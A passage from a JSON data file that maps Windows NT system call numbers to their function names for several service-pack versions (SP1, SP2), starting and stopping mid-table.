\"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelDeviceWakeupRequest\", \"135\": \"NtCancelIoFileEx\", \"136\": \"NtCancelSynchronousIoFile\", \"137\": \"NtClearAllSavepointsTransaction\", \"138\": \"NtClearSavepointTransaction\", \"139\": \"NtCommitComplete\", \"140\": \"NtCommitEnlistment\", \"141\": \"NtCommitTransaction\", \"142\": \"NtCompactKeys\", \"143\": \"NtCompareTokens\", \"144\": \"NtCompleteConnectPort\", \"145\": \"NtCompressKey\", \"146\": \"NtConnectPort\", \"147\": \"NtCreateDebugObject\", \"148\": \"NtCreateDirectoryObject\", \"149\": \"NtCreateEnlistment\", \"150\": \"NtCreateEventPair\", \"151\": \"NtCreateIoCompletion\", \"152\": \"NtCreateJobObject\", \"153\": \"NtCreateJobSet\", \"154\": \"NtCreateKeyTransacted\", \"155\": \"NtCreateKeyedEvent\", \"156\": \"NtCreateMailslotFile\", \"157\": \"NtCreateMutant\", \"158\": \"NtCreateNamedPipeFile\", \"159\": \"NtCreatePagingFile\", \"160\": \"NtCreatePort\", \"161\": \"NtCreatePrivateNamespace\", \"162\": \"NtCreateProcess\", \"163\": \"NtCreateProfile\", \"164\": \"NtCreateResourceManager\", \"165\": \"NtCreateSemaphore\", \"166\": \"NtCreateSymbolicLinkObject\", \"167\": \"NtCreateThreadEx\", \"168\": \"NtCreateTimer\", \"169\": \"NtCreateToken\", \"170\": \"NtCreateTransaction\", \"171\": \"NtCreateTransactionManager\", \"172\": \"NtCreateUserProcess\", \"173\": \"NtCreateWaitablePort\", \"174\": \"NtCreateWorkerFactory\", \"175\": \"NtDebugActiveProcess\", \"176\": \"NtDebugContinue\", \"177\": \"NtDeleteAtom\", \"178\": \"NtDeleteBootEntry\", \"179\": \"NtDeleteDriverEntry\", \"180\": \"NtDeleteFile\", \"181\": \"NtDeleteKey\", \"182\": \"NtDeleteObjectAuditAlarm\", \"183\": \"NtDeletePrivateNamespace\", \"184\": \"NtDeleteValueKey\", \"185\": \"NtDisplayString\", \"186\": \"NtEnumerateBootEntries\", \"187\": \"NtEnumerateDriverEntries\", \"188\": \"NtEnumerateSystemEnvironmentValuesEx\", \"189\": \"NtEnumerateTransactionObject\", \"190\": \"NtExtendSection\", \"191\": \"NtFilterToken\", \"192\": \"NtFlushInstallUILanguage\", \"193\": \"NtFlushInstructionCache\", \"194\": \"NtFlushKey\", \"195\": \"NtFlushProcessWriteBuffers\", \"196\": \"NtFlushVirtualMemory\", \"197\": \"NtFlushWriteBuffer\", \"198\": \"NtFreeUserPhysicalPages\", \"199\": \"NtFreezeRegistry\", \"200\": \"NtFreezeTransactions\", \"201\": \"NtGetContextThread\", \"202\": \"NtGetCurrentProcessorNumber\", \"203\": \"NtGetDevicePowerState\", \"204\": \"NtGetMUIRegistryInfo\", \"205\": \"NtGetNextProcess\", \"206\": \"NtGetNextThread\", \"207\": \"NtGetNlsSectionPtr\", \"208\": \"NtGetNotificationResourceManager\", \"209\": \"NtGetPlugPlayEvent\", \"210\": \"NtGetWriteWatch\", \"211\": \"NtImpersonateAnonymousToken\", \"212\": \"NtImpersonateThread\", \"213\": \"NtInitializeNlsFiles\", \"214\": \"NtInitializeRegistry\", \"215\": \"NtInitiatePowerAction\", \"216\": \"NtIsSystemResumeAutomatic\", \"217\": \"NtIsUILanguageComitted\", \"218\": \"NtListTransactions\", \"219\": \"NtListenPort\", \"220\": \"NtLoadDriver\", \"221\": \"NtLoadKey\", \"222\": \"NtLoadKey2\", \"223\": \"NtLoadKeyEx\", \"224\": \"NtLockFile\", \"225\": \"NtLockProductActivationKeys\", \"226\": \"NtLockRegistryKey\", \"227\": \"NtLockVirtualMemory\", \"228\": \"NtMakePermanentObject\", \"229\": \"NtMakeTemporaryObject\", \"230\": \"NtMapCMFModule\", \"231\": \"NtMapUserPhysicalPages\", \"232\": \"NtMarshallTransaction\", \"233\": \"NtModifyBootEntry\", \"234\": \"NtModifyDriverEntry\", \"235\": \"NtNotifyChangeDirectoryFile\", \"236\": \"NtNotifyChangeKey\", \"237\": \"NtNotifyChangeMultipleKeys\", \"238\": \"NtOpenEnlistment\", \"239\": \"NtOpenEventPair\", \"240\": \"NtOpenIoCompletion\", \"241\": \"NtOpenJobObject\", \"242\": \"NtOpenKeyTransacted\", \"243\": \"NtOpenKeyedEvent\", \"244\": \"NtOpenMutant\", \"245\": \"NtOpenObjectAuditAlarm\", \"246\": \"NtOpenPrivateNamespace\", \"247\": \"NtOpenProcessToken\", \"248\": \"NtOpenResourceManager\", \"249\": \"NtOpenSemaphore\", \"250\": \"NtOpenSession\", \"251\": \"NtOpenSymbolicLinkObject\", \"252\": \"NtOpenThread\", \"253\": \"NtOpenTimer\", \"254\": \"NtOpenTransaction\", \"255\": \"NtOpenTransactionManager\", \"256\": \"NtPlugPlayControl\", \"257\": \"NtPrePrepareComplete\", \"258\": \"NtPrePrepareEnlistment\", \"259\": \"NtPrepareComplete\", \"260\": \"NtPrepareEnlistment\", \"261\": \"NtPrivilegeCheck\", \"262\": \"NtPrivilegeObjectAuditAlarm\", \"263\": \"NtPrivilegedServiceAuditAlarm\", \"264\": \"NtPropagationComplete\", \"265\": \"NtPropagationFailed\", \"266\": \"NtPullTransaction\", \"267\": \"NtPulseEvent\", \"268\": \"NtQueryBootEntryOrder\", \"269\": \"NtQueryBootOptions\", \"270\": \"NtQueryDebugFilterState\", \"271\": \"NtQueryDirectoryObject\", \"272\": \"NtQueryDriverEntryOrder\", \"273\": \"NtQueryEaFile\", \"274\": \"NtQueryFullAttributesFile\", \"275\": \"NtQueryInformationAtom\", \"276\": \"NtQueryInformationEnlistment\", \"277\": \"NtQueryInformationJobObject\", \"278\": \"NtQueryInformationPort\", \"279\": \"NtQueryInformationResourceManager\", \"280\": \"NtQueryInformationTransaction\", \"281\": \"NtQueryInformationTransactionManager\", \"282\": \"NtQueryInformationWorkerFactory\", \"283\": \"NtQueryInstallUILanguage\", \"284\": \"NtQueryIntervalProfile\", \"285\": \"NtQueryIoCompletion\", \"286\": \"NtQueryLicenseValue\", \"287\": \"NtQueryMultipleValueKey\", \"288\": \"NtQueryMutant\", \"289\": \"NtQueryOpenSubKeys\", \"290\": \"NtQueryOpenSubKeysEx\", \"291\": \"NtQueryPortInformationProcess\", \"292\": \"NtQueryQuotaInformationFile\", \"293\": \"NtQuerySecurityObject\", \"294\": \"NtQuerySemaphore\", \"295\": \"NtQuerySymbolicLinkObject\", \"296\": \"NtQuerySystemEnvironmentValue\", \"297\": \"NtQuerySystemEnvironmentValueEx\", \"298\": \"NtQueryTimerResolution\", \"299\": \"NtRaiseException\", \"300\": \"NtRaiseHardError\", \"301\": \"NtReadOnlyEnlistment\", \"302\": \"NtRecoverEnlistment\", \"303\": \"NtRecoverResourceManager\", \"304\": \"NtRecoverTransactionManager\", \"305\": \"NtRegisterProtocolAddressInformation\", \"306\": \"NtRegisterThreadTerminatePort\", \"307\": \"NtReleaseCMFViewOwnership\", \"308\": \"NtReleaseKeyedEvent\", \"309\": \"NtReleaseWorkerFactoryWorker\", \"310\": \"NtRemoveIoCompletionEx\", \"311\": \"NtRemoveProcessDebug\", \"312\": \"NtRenameKey\", \"313\": \"NtReplaceKey\", \"314\": \"NtReplyWaitReplyPort\", \"315\": \"NtRequestDeviceWakeup\", \"316\": \"NtRequestPort\", \"317\": \"NtRequestWakeupLatency\", \"318\": \"NtResetEvent\", \"319\": \"NtResetWriteWatch\", \"320\": \"NtRestoreKey\", \"321\": \"NtResumeProcess\", \"322\": \"NtRollbackComplete\", \"323\": \"NtRollbackEnlistment\", \"324\": \"NtRollbackSavepointTransaction\", \"325\": \"NtRollbackTransaction\", \"326\": \"NtRollforwardTransactionManager\", \"327\": \"NtSaveKey\", \"328\": \"NtSaveKeyEx\", \"329\": \"NtSaveMergedKeys\", \"330\": \"NtSavepointComplete\", \"331\": \"NtSavepointTransaction\", \"332\": \"NtSecureConnectPort\", \"333\": \"NtSetBootEntryOrder\", \"334\": \"NtSetBootOptions\", \"335\": \"NtSetContextThread\", \"336\": \"NtSetDebugFilterState\", \"337\": \"NtSetDefaultHardErrorPort\", \"338\": \"NtSetDefaultLocale\", \"339\": \"NtSetDefaultUILanguage\", \"340\": \"NtSetDriverEntryOrder\", \"341\": \"NtSetEaFile\", \"342\": \"NtSetHighEventPair\", \"343\": \"NtSetHighWaitLowEventPair\", \"344\": \"NtSetInformationDebugObject\", \"345\": \"NtSetInformationEnlistment\", \"346\": \"NtSetInformationJobObject\", \"347\": \"NtSetInformationKey\", \"348\": \"NtSetInformationResourceManager\", \"349\": \"NtSetInformationToken\", \"350\": \"NtSetInformationTransaction\", \"351\": \"NtSetInformationTransactionManager\", \"352\": \"NtSetInformationWorkerFactory\", \"353\": \"NtSetIntervalProfile\", \"354\": \"NtSetIoCompletion\", \"355\": \"NtSetLdtEntries\", \"356\": \"NtSetLowEventPair\", \"357\": \"NtSetLowWaitHighEventPair\", \"358\": \"NtSetQuotaInformationFile\", \"359\": \"NtSetSecurityObject\", \"360\": \"NtSetSystemEnvironmentValue\", \"361\": \"NtSetSystemEnvironmentValueEx\", \"362\": \"NtSetSystemInformation\", \"363\": \"NtSetSystemPowerState\", \"364\": \"NtSetSystemTime\", \"365\": \"NtSetThreadExecutionState\", \"366\": \"NtSetTimerResolution\", \"367\": \"NtSetUuidSeed\", \"368\": \"NtSetVolumeInformationFile\", \"369\": \"NtShutdownSystem\", \"370\": \"NtShutdownWorkerFactory\", \"371\": \"NtSignalAndWaitForSingleObject\", \"372\": \"NtSinglePhaseReject\", \"373\": \"NtStartProfile\", \"374\": \"NtStartTm\", \"375\": \"NtStopProfile\", \"376\": \"NtSuspendProcess\", \"377\": \"NtSuspendThread\", \"378\": \"NtSystemDebugControl\", \"379\": \"NtTerminateJobObject\", \"380\": \"NtTestAlert\", \"381\": \"NtThawRegistry\", \"382\": \"NtThawTransactions\", \"383\": \"NtTraceControl\", \"384\": \"NtTranslateFilePath\", \"385\": \"NtUnloadDriver\", \"386\": \"NtUnloadKey\", \"387\": \"NtUnloadKey2\", \"388\": \"NtUnloadKeyEx\", \"389\": \"NtUnlockFile\", \"390\": \"NtUnlockVirtualMemory\", \"391\": \"NtVdmControl\", \"392\": \"NtWaitForDebugEvent\", \"393\": \"NtWaitForKeyedEvent\", \"394\": \"NtWaitForWorkViaWorkerFactory\", \"395\": \"NtWaitHighEventPair\", \"396\": \"NtWaitLowEventPair\", \"397\": \"NtWorkerFactoryWorkerReady\"}, \"SP1\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAcquireCMFViewOwnership\", \"103\": \"NtAddBootEntry\", \"104\": \"NtAddDriverEntry\", \"105\": \"NtAdjustGroupsToken\", \"106\": \"NtAlertResumeThread\", \"107\": \"NtAlertThread\", \"108\": \"NtAllocateLocallyUniqueId\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelDeviceWakeupRequest\", \"135\": \"NtCancelIoFileEx\", \"136\": \"NtCancelSynchronousIoFile\", \"137\": \"NtCommitComplete\", \"138\": \"NtCommitEnlistment\", \"139\": \"NtCommitTransaction\", \"140\": \"NtCompactKeys\", \"141\": \"NtCompareTokens\", \"142\": \"NtCompleteConnectPort\", \"143\": \"NtCompressKey\", \"144\": \"NtConnectPort\", \"145\": \"NtCreateDebugObject\", \"146\": \"NtCreateDirectoryObject\", \"147\": \"NtCreateEnlistment\", \"148\": \"NtCreateEventPair\", \"149\": \"NtCreateIoCompletion\", \"150\": \"NtCreateJobObject\", \"151\": \"NtCreateJobSet\", \"152\": \"NtCreateKeyTransacted\", \"153\": \"NtCreateKeyedEvent\", \"154\": \"NtCreateMailslotFile\", \"155\": \"NtCreateMutant\", \"156\": \"NtCreateNamedPipeFile\", \"157\": \"NtCreatePagingFile\", \"158\": \"NtCreatePort\", \"159\": \"NtCreatePrivateNamespace\", \"160\": \"NtCreateProcess\", \"161\": \"NtCreateProfile\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisplayString\", \"184\": \"NtEnumerateBootEntries\", \"185\": \"NtEnumerateDriverEntries\", \"186\": \"NtEnumerateSystemEnvironmentValuesEx\", \"187\": \"NtEnumerateTransactionObject\", \"188\": \"NtExtendSection\", \"189\": \"NtFilterToken\", \"190\": \"NtFlushInstallUILanguage\", \"191\": \"NtFlushInstructionCache\", \"192\": \"NtFlushKey\", \"193\": \"NtFlushProcessWriteBuffers\", \"194\": \"NtFlushVirtualMemory\", \"195\": \"NtFlushWriteBuffer\", \"196\": \"NtFreeUserPhysicalPages\", \"197\": \"NtFreezeRegistry\", \"198\": \"NtFreezeTransactions\", \"199\": \"NtGetContextThread\", \"200\": \"NtGetCurrentProcessorNumber\", \"201\": \"NtGetDevicePowerState\", \"202\": \"NtGetMUIRegistryInfo\", \"203\": \"NtGetNextProcess\", \"204\": \"NtGetNextThread\", \"205\": \"NtGetNlsSectionPtr\", \"206\": \"NtGetNotificationResourceManager\", \"207\": \"NtGetPlugPlayEvent\", \"208\": \"NtGetWriteWatch\", \"209\": \"NtImpersonateAnonymousToken\", \"210\": \"NtImpersonateThread\", \"211\": \"NtInitializeNlsFiles\", \"212\": \"NtInitializeRegistry\", \"213\": \"NtInitiatePowerAction\", \"214\": \"NtIsSystemResumeAutomatic\", \"215\": \"NtIsUILanguageComitted\", \"216\": \"NtListenPort\", \"217\": \"NtLoadDriver\", \"218\": \"NtLoadKey\", \"219\": \"NtLoadKey2\", \"220\": \"NtLoadKeyEx\", \"221\": \"NtLockFile\", \"222\": \"NtLockProductActivationKeys\", \"223\": \"NtLockRegistryKey\", \"224\": \"NtLockVirtualMemory\", \"225\": \"NtMakePermanentObject\", \"226\": \"NtMakeTemporaryObject\", \"227\": \"NtMapCMFModule\", \"228\": \"NtMapUserPhysicalPages\", \"229\": \"NtModifyBootEntry\", \"230\": \"NtModifyDriverEntry\", \"231\": \"NtNotifyChangeDirectoryFile\", \"232\": \"NtNotifyChangeKey\", \"233\": \"NtNotifyChangeMultipleKeys\", \"234\": \"NtOpenEnlistment\", \"235\": \"NtOpenEventPair\", \"236\": \"NtOpenIoCompletion\", \"237\": \"NtOpenJobObject\", \"238\": \"NtOpenKeyTransacted\", \"239\": \"NtOpenKeyedEvent\", \"240\": \"NtOpenMutant\", \"241\": \"NtOpenObjectAuditAlarm\", \"242\": \"NtOpenPrivateNamespace\", \"243\": \"NtOpenProcessToken\", \"244\": \"NtOpenResourceManager\", \"245\": \"NtOpenSemaphore\", \"246\": \"NtOpenSession\", \"247\": \"NtOpenSymbolicLinkObject\", \"248\": \"NtOpenThread\", \"249\": \"NtOpenTimer\", \"250\": \"NtOpenTransaction\", \"251\": \"NtOpenTransactionManager\", \"252\": \"NtPlugPlayControl\", \"253\": \"NtPrePrepareComplete\", \"254\": \"NtPrePrepareEnlistment\", \"255\": \"NtPrepareComplete\", \"256\": \"NtPrepareEnlistment\", \"257\": \"NtPrivilegeCheck\", \"258\": \"NtPrivilegeObjectAuditAlarm\", \"259\": \"NtPrivilegedServiceAuditAlarm\", \"260\": \"NtPropagationComplete\", \"261\": \"NtPropagationFailed\", \"262\": \"NtPulseEvent\", \"263\": \"NtQueryBootEntryOrder\", \"264\": \"NtQueryBootOptions\", \"265\": \"NtQueryDebugFilterState\", \"266\": \"NtQueryDirectoryObject\", \"267\": \"NtQueryDriverEntryOrder\", \"268\": \"NtQueryEaFile\", \"269\": \"NtQueryFullAttributesFile\", \"270\": \"NtQueryInformationAtom\", \"271\": \"NtQueryInformationEnlistment\", \"272\": \"NtQueryInformationJobObject\", \"273\": \"NtQueryInformationPort\", \"274\": \"NtQueryInformationResourceManager\", \"275\": \"NtQueryInformationTransaction\", \"276\": \"NtQueryInformationTransactionManager\", \"277\": \"NtQueryInformationWorkerFactory\", \"278\": \"NtQueryInstallUILanguage\", \"279\": \"NtQueryIntervalProfile\", \"280\": \"NtQueryIoCompletion\", \"281\": \"NtQueryLicenseValue\", \"282\": \"NtQueryMultipleValueKey\", \"283\": \"NtQueryMutant\", \"284\": \"NtQueryOpenSubKeys\", \"285\": \"NtQueryOpenSubKeysEx\", \"286\": \"NtQueryPortInformationProcess\", \"287\": \"NtQueryQuotaInformationFile\", \"288\": \"NtQuerySecurityObject\", \"289\": \"NtQuerySemaphore\", \"290\": \"NtQuerySymbolicLinkObject\", \"291\": \"NtQuerySystemEnvironmentValue\", \"292\": \"NtQuerySystemEnvironmentValueEx\", \"293\": \"NtQueryTimerResolution\", \"294\": \"NtRaiseException\", \"295\": \"NtRaiseHardError\", \"296\": \"NtReadOnlyEnlistment\", \"297\": \"NtRecoverEnlistment\", \"298\": \"NtRecoverResourceManager\", \"299\": \"NtRecoverTransactionManager\", \"300\": \"NtRegisterProtocolAddressInformation\", \"301\": \"NtRegisterThreadTerminatePort\", \"302\": \"NtReleaseCMFViewOwnership\", \"303\": \"NtReleaseKeyedEvent\", \"304\": \"NtReleaseWorkerFactoryWorker\", \"305\": \"NtRemoveIoCompletionEx\", \"306\": \"NtRemoveProcessDebug\", \"307\": \"NtRenameKey\", \"308\": \"NtRenameTransactionManager\", \"309\": \"NtReplaceKey\", \"310\": \"NtReplacePartitionUnit\", \"311\": \"NtReplyWaitReplyPort\", \"312\": \"NtRequestDeviceWakeup\", \"313\": \"NtRequestPort\", \"314\": \"NtRequestWakeupLatency\", \"315\": \"NtResetEvent\", \"316\": \"NtResetWriteWatch\", \"317\": \"NtRestoreKey\", \"318\": \"NtResumeProcess\", \"319\": \"NtRollbackComplete\", \"320\": \"NtRollbackEnlistment\", \"321\": \"NtRollbackTransaction\", \"322\": \"NtRollforwardTransactionManager\", \"323\": \"NtSaveKey\", \"324\": \"NtSaveKeyEx\", \"325\": \"NtSaveMergedKeys\", \"326\": \"NtSecureConnectPort\", \"327\": \"NtSetBootEntryOrder\", \"328\": \"NtSetBootOptions\", \"329\": \"NtSetContextThread\", \"330\": \"NtSetDebugFilterState\", \"331\": \"NtSetDefaultHardErrorPort\", \"332\": \"NtSetDefaultLocale\", \"333\": \"NtSetDefaultUILanguage\", \"334\": \"NtSetDriverEntryOrder\", \"335\": \"NtSetEaFile\", \"336\": \"NtSetHighEventPair\", \"337\": \"NtSetHighWaitLowEventPair\", \"338\": \"NtSetInformationDebugObject\", \"339\": \"NtSetInformationEnlistment\", \"340\": \"NtSetInformationJobObject\", \"341\": \"NtSetInformationKey\", \"342\": \"NtSetInformationResourceManager\", \"343\": \"NtSetInformationToken\", \"344\": \"NtSetInformationTransaction\", \"345\": \"NtSetInformationTransactionManager\", \"346\": \"NtSetInformationWorkerFactory\", \"347\": \"NtSetIntervalProfile\", \"348\": \"NtSetIoCompletion\", \"349\": \"NtSetLdtEntries\", \"350\": \"NtSetLowEventPair\", \"351\": \"NtSetLowWaitHighEventPair\", \"352\": \"NtSetQuotaInformationFile\", \"353\": \"NtSetSecurityObject\", \"354\": \"NtSetSystemEnvironmentValue\", \"355\": \"NtSetSystemEnvironmentValueEx\", \"356\": \"NtSetSystemInformation\", \"357\": \"NtSetSystemPowerState\", \"358\": \"NtSetSystemTime\", \"359\": \"NtSetThreadExecutionState\", \"360\": \"NtSetTimerResolution\", \"361\": \"NtSetUuidSeed\", \"362\": \"NtSetVolumeInformationFile\", \"363\": \"NtShutdownSystem\", \"364\": \"NtShutdownWorkerFactory\", \"365\": \"NtSignalAndWaitForSingleObject\", \"366\": \"NtSinglePhaseReject\", \"367\": \"NtStartProfile\", \"368\": \"NtStopProfile\", \"369\": \"NtSuspendProcess\", \"370\": \"NtSuspendThread\", \"371\": \"NtSystemDebugControl\", \"372\": \"NtTerminateJobObject\", \"373\": \"NtTestAlert\", \"374\": \"NtThawRegistry\", \"375\": \"NtThawTransactions\", \"376\": \"NtTraceControl\", \"377\": \"NtTranslateFilePath\", \"378\": \"NtUnloadDriver\", \"379\": \"NtUnloadKey\", \"380\": \"NtUnloadKey2\", \"381\": \"NtUnloadKeyEx\", \"382\": \"NtUnlockFile\", \"383\": \"NtUnlockVirtualMemory\", \"384\": \"NtVdmControl\", \"385\": \"NtWaitForDebugEvent\", \"386\": \"NtWaitForKeyedEvent\", \"387\": \"NtWaitForWorkViaWorkerFactory\", \"388\": \"NtWaitHighEventPair\", \"389\": \"NtWaitLowEventPair\", \"390\": \"NtWorkerFactoryWorkerReady\"}, \"SP2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": 